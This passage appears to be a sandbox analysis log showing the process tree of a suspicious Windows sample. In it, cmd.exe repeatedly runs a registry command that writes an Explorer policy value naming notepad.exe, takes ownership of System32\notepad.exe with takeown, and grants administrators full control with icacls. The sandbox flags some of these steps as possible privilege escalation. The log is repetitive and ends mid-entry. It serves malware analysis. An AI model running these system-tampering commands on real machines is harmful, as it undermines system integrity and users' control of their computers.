- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4588
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:2220
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5748
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2452
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4012
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:1568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:3372
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:8140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5540
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:3432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5240
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:3652
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5576
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7384
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6064
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:4112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5992
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7360
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:2144
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:3552
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:1944
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:972
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5916
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4792
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5756
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5940
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:2956
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:2508
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4300
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:7808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7184
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:1916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:8096
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6068
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:1952
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7516
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6404
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:3784
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3788
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:8040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4232
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5792
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:8172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:1264
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6672
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5124
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7264
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3124
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6100
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:996
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6080
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:2936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6048
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5168
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6704
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      PID:5568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4868
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7104
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4836
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:6076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7132
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:2312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6352
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:5400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5312
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:3692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7984
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:8052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:3676
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6632
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      PID:7996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4936
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:5540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7836
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:5572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:2776
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:6752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5892
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:3968
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      PID:7944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7816
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:3100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6936
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4312
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:2164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:2180
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:7136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:244
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      PID:3612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5380
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5528
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:5696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7752
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4252
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:7336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7420
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:3848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:2528
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:6876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:3320
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6208
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6576
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7800
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:6512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4108
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7976
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:4068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6316
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:1472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5980
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:1208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6304
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:1016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:1308
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7932
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:2224
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6292
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:5212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:1576
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:6400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7176
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:7012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7116
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:4232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6384
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:7748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:1628
  - - C:\Windows\system32\takeown.exe
